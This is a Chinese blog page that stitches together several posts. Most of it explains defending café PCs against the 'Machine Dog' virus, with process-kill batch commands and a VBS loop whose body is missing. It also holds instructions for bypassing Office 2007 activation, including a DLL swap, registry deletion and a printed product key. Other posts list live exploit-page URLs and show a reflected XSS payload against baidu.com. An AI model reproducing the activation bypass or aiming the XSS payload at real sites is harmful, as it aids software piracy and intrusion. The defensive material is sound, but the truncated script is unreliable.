这样子看来，基于文件名的防疫方式宣告失败。有人还在不停的建那些怪异目录，以图防疫机器狗病毒。可这样子下去，你的系统里为增添多少**目录？你最后，你自己也没法删除这些**，甚至不得不格式化硬盘。

封域名，封IP
早期机器狗病毒，可以通过简单的反汇编工具，找到相应的下载病毒的网址。后期的机器狗病毒变种，也可通过查看中毒机器的IE临时文件找到下载病毒的网址。
机器狗病毒被各种检测方式很快被找到了，其ip地址和域名也能被发现。于是，在服务器或路由器里封掉这些域名或IP，的确可以有效防治它。然而，恶梦不会因此而结束。据笔者自身封的IP和域名，目前加起来已多达三十多个。还不包括每天都要新的域名或IP被以各种方式发现出来。
ROS里脚本在无限的加长些，路由器里的列表也就无限的增长着。这样的日子，我们看不到尽头在哪儿。

两行批处理，问题看是搞定，但也治标不治本

随着对机器狗病毒研究的深入，大家都一致发现了问题的关键在于userinit.exe和usrinit.exe（后期变种）文件。基于这点出发，可以使用以下两个批处理搞定问题：

wmic process where name=”userinit.exe” call terminate
wmic process where name=”usrinit.exe” call terminate
这是批处理高手写的，果然非同反响。该代码的的意思是：当发现进程里有userinit.exe时，即关闭；当发现进程里有usrinit.exe时，也关闭。因为批处理在winlogon后运行，所以病毒刚启动，就被杀掉了。这样也就失去了下载其它病毒的机会。不过，缺点是它只运行一次。这两代批处理的基础上，加入了每秒检查进程，一发现即终止的vbs脚本：

do while(1)
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)

Wscript.Sleep(1000)
Loop
这段vbs脚本的机制和以上两段代码有异曲同工之妙。不过，用了无限循环语句，实现了对进程的动态监控，使得被监控进程无法运行。
然而，无论如何，这也依然是治标（userinit.exe）的方法，而非治本（内核驱动被加载，并成功穿透还原软件）的方法。

各大公司，各其奇谋，其中不泛有高手中的高手。给出的方案也是切中要害，一针见血的。

第一节 从底层防病毒-内核也玩驱动过滤

这招首推南京小哨兵公司推出的机器狗防疫补丁。通过安装该补丁侦察得知，该防疫补丁在内核驱动中加入了相关文件，并在进程里进行了监听，便于软件补丁的升级。早期的防疫补丁可能有缺陷，会造成系统死机等现象，以及防不了变种等。由于其不断更新，防疫级别在系统底层，应该是值得信赖的。
小哨兵官方网站：http://www.sentry.com.cn，时常关注，应该能下载到最新的防疫补丁

第二节 从系统引导文件NTLDR下手

NTLDR是xp系统的内核级引导文件，关于它的介绍如下：

深入Win XP之认识神秘的引导文件NTLDR

NTLDR一般存放于C盘根目录下，是一个具有隐藏和只读属性的系统文件。它的主要职责是解析Boot.ini文件。如果你对它的理解还不是很清楚，那么下面我们就以Windows XP为例介绍NTLDR在系统引导过程中的作用。
Windows XP在引导过程中将经历预引导、引导和加载内核三个阶段，这与Windows 9X直接读取引导扇区的方式来启动系统是完全不一样的，NTLDR在这三个阶段的引导过程中将起到至关重要的作用。

1．预引导阶段

在预引导阶段里计算机所做的工作有：运行POST程序，POST将检测系统的总内存以及其他硬件设备的状况，将磁盘第一个物理扇区加载到内存，加载硬盘主引导记录并运行，主引导记录会查找活动分区的起始位置。接着活动分区的引导扇区被加载并执行，最后从引导扇区加载并初始化NTLDR文件。

2．引导阶段

在引导阶段中，Windows XP将会依次经历初始引导加载器阶段、操作系统选择阶段、硬件检测阶段以及配置选择阶段这四个小的阶段。

（1）在初始引导加载器阶段中，NTLDR将把计算机的微处理器从实模式转换为32位平面内存模式，在实模式中，系统会为MS－DOS预留640KB 大小的内存空间，其余的内存都被看做是扩展内存，在32位平面模式中系统将所有内存都视为可用内存，然后NTLDR执行适当的小型文件系统驱动程序，这时 NTLDR可以识别每一个用NTFS或FAT格式的文件系统分区，至此初始引导加载器阶段结束。

（2）当初始引导加载器阶段结束后将会进入操作系统选择阶段，如果计算机上安装了多个操作系统，由于NTLDR加载了正确的Boot.ini文件，那么在启动的时候将会出现要求选择操作系统的菜单，NTLDR正是从boot.ini文件中查找到系统文件的分区位置。如果选择了NT系统，那么NTLDR 将会运行NTDETECT.COM文件，否则NTLDR将加载BOOTSECT.DOS，然后将控制权交给BOOTSECT.DOS。如果 Boot.ini文件中只有一个操作系统或者其中的timeout值为0，那么将不会出现选择操作系统的菜单画面，如果Boot.ini文件非法或不存在，那么NTLDR将会尝试从默认系统卷启动系统。

小提示：NTLDR启动后，如果在系统根目录下发现有Hiberfil.sys文件且该文件有效，那么NTLDR将读取Hiberfil.sys文件里的信息并让系统恢复到休眠以前的状态，这时并不处理Boot.ini文件。

（3）当操作系统选择阶段结束后将会进入硬件检测阶段，这时NTDETECT.COM文件将会收集计算机中硬件信息列表，然后将列表返回到NTLDR，这样NTLDR将把这些硬件信息加载到注册表“HKEY_LOCAL_MACHINE”中的Hardware中。

（4）硬件检测阶段结束后将会进入配置选择阶段，如果有多个硬件配置列表，那么将会出现配置文件选择菜单，如果只有一个则不会显示。

3．加载内核阶段

在加载内核阶段中，NTLDR将加载NTOKRNL.EXE内核程序，然后NTLDR将加载硬件抽象层(HAL.dll)，接着系统将加载注册表中的 “HKEY_MACHINESystem”键值，这时NTLDR将读取“HKEY_MACHINESystemselect”键值来决定哪一个 ControlSet将被加载。所加载的ControlSet将包含设备的驱动程序以及需要加载的服务。再接着NTLDR加载注册表 “HKEY_LOCAL_MACHINESystemservice”下的start键值为0的底层设备驱动。当ControlSet的镜像 CurrentControlSet被加载时，NTLDR将把控制权传递给NTOSKRNL.EXE，至此引导过程将结束。

小提示：如果在启动的时候按F8键，那么我们将会在启动菜单中看到多种选择启动模式，这时NTLDR将根据用户的选择来使用启动参数加载NT内核，用户也可以在Boot.ini文件里设置启动参数。
通过修改这一特殊文件，达到防疫机器狗病毒的，首推转转游戏公司。它修改这一文件，并将userinit.exe文件改名为www.ceelsoft.com.userinit文件名，并置入根目录下，达到防疫冰点被穿透的目的。具体细节，得问他们公司的技术人员了。转转最新机器狗补丁下载：

http://www.ceelsoft.com/nb/proxy/www/new0.htm

第三节 系统补丁还必须得都打上

系统漏洞给病毒提供可乘之机的例子，可谓举不胜举。可是，还是有些网吧网管兄弟图个简便，图个懒，做个系统，N年都懒得管他。由于系统补丁未能及时打上，给病毒提供可利用的漏洞，大开方便之门，类似于机器狗病毒泛滥也就不奇怪了。

笔者实测显示，默认安装完windows Xp SP2后，到今天为止，还必须给系统打上多达七十多个补丁。这么多的补丁，哪怕有一个没打好，都有可能给病毒带来机会。

第四节 插件，应用软件漏洞也不得不防

IE插件，各类流氓软件，以及以各种形式安装的控件，都有可能给系统带来新的漏洞。这一点，恐怕我们以前从未意识到。有些兄弟在做完系统后，甚至都懒得清理一下系统里这些**残渣。很多免费软件，都会多少默认安装一些插件或流邙软件，以图一点广告经济利益。而做完系统，又没能很好的清理之，就给系统带来漏洞。百度搜霸就是个很好的例子.

另外，一些应用软件的漏洞，也给病毒提供了可乘之机。诸如本文提到迅雷，realplay，以及通过ppstream（也可以说它是IE插件）这些常用软件等。这些软件的漏洞，往往不会引起注意。然而，他们带来的灾难，不亚于系统漏洞。通过本文先前给出的源码，不难看出这一点.

第五节 全网大检查

现在你可以，也应该对你管理的局域网络进行全面大检查了。检查你的系统是否中了机器狗病毒，是否存有以上提到的那些漏洞，检查你是否都打好了各种防穿透补丁和防疫补丁。

Related posts:

• 对比文件日期更新(XCOPY) 网吧批处理运用2
• arp欺骗和机器狗病毒简单免疫批处理脚本(bat)

如果有什么问题，我还是希望能在wiki中提出。

留个纪念截个图，现在还能访问我想应该是服务器缓存在起作用，图片都已经不能显示啦。

Related posts:

• Google page rank更新（2008-05-01）
• 今日杂碎：Google想把我K啦还是在换血
• 把访问其他主机名地址重定向到指定主机名(域名)
• 决定正式启用clin003.com域名：域名变更
• 今天圆宵节

修改系统盘：C:\WINDOWS\system32\drivers\etc＼host（用记事本打开）文件添加这句可以临时解决再次中这个站的木马病毒

127.0.0.1 al.99.vc

屏蔽这个网站就可以啦

。。。

http://w18.vg/real.gif貌似感染real，如果你有ｒｅａｌｏｎｅ建议卸掉或者去官方下载最新的版本装上。如果你看到ｒｅａｌｏｎｅ不是有错误提示说明你的ｒｅａｌｏｎｅ有漏洞。

http://w18.vg/ms.gif这个貌似只有ｉｅ７才会被中上。所以建议你打上最新的ｉｅ补丁。

http://w18.vg/baidu.gif百度搜霸的漏洞利用，建议直接卸掉就可以啦。或者升级你的搜霸。

http://w18.vg/x1.gif这个已经为404页啦不清楚是什么

http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具

http://w18.vg/bf.gif暴风影音的漏洞利用，建议去下载新的暴风影音

如果个人机子建议打开病毒实时检测功能。

如果你有更好的建议，谢谢分享。

Related posts:

• 安装office 2007企业版然后提示激活解决办法
• ASP.NET 安全策略学习与 .NET 测试环境搭建
• 25个顶级PHP模板引擎
• 超过一百多个web2.o在线生成器

这个（cknum.xunlei.com）是pplive的一个广告服务器(频道)。

还不清楚pplive和迅雷是不是只是广告上的合作。

pplive的广告服务器地址有：

cknum.xunlei.com

cop.my.xunlei.com
biz5.sandai.net
pt.cga.com.cn
pp.pplive.com

Related posts:

• Firefox代理使用办法
• 某局对谷歌音乐下手啦？
• 今日杂碎：邮件
• 原来是迅雷惹的祸
• 今日杂碎：域名纠错——>域名劫持

1、到微软官方网站进行Office正版验证，地址是：http://www.microsoft.com/genuine/default.aspx?displaylang=zh-cn，呵呵，验证记过当然是盗版了，没关系，下载 （OGACheckControl）这个dll文件，替换掉c:\windows\system32\下面的同名文件。这个文件必须是你进行验证才会生成的。还有替换的时候记得关闭IE浏览器。

2、开始–运行–输入“regedit”打开注册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\
将所有{90120000-0030-0000-0000-0000000FF1CE}类似名下的DigitalProductID，ProductID键值删除。

3，打开word，此时，提示你输入序列号， 输入可以用的序列号然后立即安装就可以在一分钟之内激活office2007啦就可以啦

这里提供些个能用的序列号：

V9MTG-3GX8P-D3Y4R-68BQ8-4Q8VD

也可以用这个序列号生成器：

Related posts:

• 去除Office onenote 2007的激活验证和试用版标记
• 从pdf图片中抓取文字
• Visual C++ 2008 Feature Pack Beta
• Office 2007又复活啦
• windows的的墨水服务『office2007的Microsoft Office Document Image安装』

Related posts:

• Testing phone post
• 看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马
• Gmail要求手机验证怎么办 (国家列表中没有China)
• 手机嗅探扫描，窃…
• Fedora 11 下硬盘安装(升级)到 Fedora 12

直接复制下面的地址到IE浏览器中去看效果吧：(实验时自行去掉中间的空格)
http://www.baidu.com/index.php?tn=”>http://www.baidu.com/index.php?tn=”>< script>alert(/wiki.mygogou.com/)< /script>

把这段代码中间的网址修改成我们的首页地址：
http://www.baidu.com/index.php?tn=”>http://wiki.mygogou.com=”>< script>alert(/wiki.mygogou.com/)< /script>

wiki地址：http://wiki.mygogou.com/doc-view-744.html 

Related posts:

• 腾讯体验中心跨站漏洞及利用想法
• 百度搜索联盟广告跨站漏洞
• 百度准备自杀啦？
• 去除Office onenote 2007的激活验证和试用版标记
• 百度的新年愿景